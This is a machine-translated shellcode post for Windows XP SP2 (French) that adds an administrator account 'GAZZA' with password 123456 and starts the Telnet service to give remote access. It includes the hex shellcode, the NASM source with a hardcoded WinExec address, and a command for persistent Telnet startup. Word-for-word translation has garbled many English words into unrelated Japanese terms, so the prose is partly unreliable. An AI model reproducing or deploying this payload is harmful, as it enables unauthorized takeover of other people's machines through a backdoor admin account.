このページはEtoJ逐語翻訳フィルタによって翻訳生成されました。 |
; payload:追加する admin acount & Telnet Listening ; Author: DATA_SNIPER ; size:111 bytes ; 壇・綱領・公約:WIN32/XP SP2 FR ; thanks:Arab4services team & AT4RE Team ; more info: visit my blog http://datasniper.arab4services.逮捕する ; The Sh3llcode: ; "\xEB\x08\xBA\x4D\x11\x86\x7C\xFF\xD2\xCC\xE8\xF3\xFF\xFF\xFF\x63\x6D\x64\x20\x2F\x63" ; "\x20\x6E\x65\x74\x20\x75\x73\x65\x72\x20\x68\x69\x6C\x6C\x20\x31\x32\x33\x34\x35" ; "\x36\x20\x2F\x41\x44\x44\x20\x26\x26\x20\x6E\x65\x74\x20\x6C\x6F\x63\x61\x6C\x67" ; "\x72\x6F\x75\x70\x20\x41\x64\x6D\x69\x6E\x69\x73\x74\x72\x61\x74\x65\x75\x72\x73" ; "\x20\x68\x69\x6C\x6C\x20\x2F\x41\x44\x44\x20\x26\x26\x20\x73\x63\x20\x73\x74\x61" ; "\x72\x74\x20\x54\x6C\x6E\x74\x53\x76\x72\x00" ; Description: it's simular to TCP BindShell on port 23,throught 命令(する) 死刑執行 we can get 爆撃する 接近 throught telnet service on Windows b0x. ; 追加する admin account 命令(する) 使用者=GAZZA ,pass=123456 :cmd /c 逮捕する 使用者 GAZZA 123456 /ADD && 逮捕する localgroup Administrateurs GAZZA /ADD ; Start telnet service: sc start TlntSvr ; For saving ur 接近 to the B0x again and again :),u can use this 命令(する): ; "sc config TlntSvr start= 自動車 & sc start TlntSvr" instead of: ; "sc start TlntSvr" ; NASM -s -fbin telnetbind.asm BITS 32 db 0EBh,08h ;such as "jmp Data" ,i puted it in opcode 判型 for 避けるing null problem. Exec: MOV EDX,7C86114Dh ;WinExec addr in WIN XP SP2 FR CALL EDX INT3 ;just interrupter (hung the shellcode after it do his 職業,any way u can use ExitProcess) for 避けるing infinite 宙返り飛行 Data: CALL Exec db 'cmd /c 逮捕する 使用者 GAZZA 123456 /ADD & 逮捕する localgroup Administrateurs GAZZA /ADD & sc start TlntSvr',00h ;追加する 使用者 GAZA with 123456 password and start telnet service ;BTW the exstension 削減(する)d for saving som byte ;)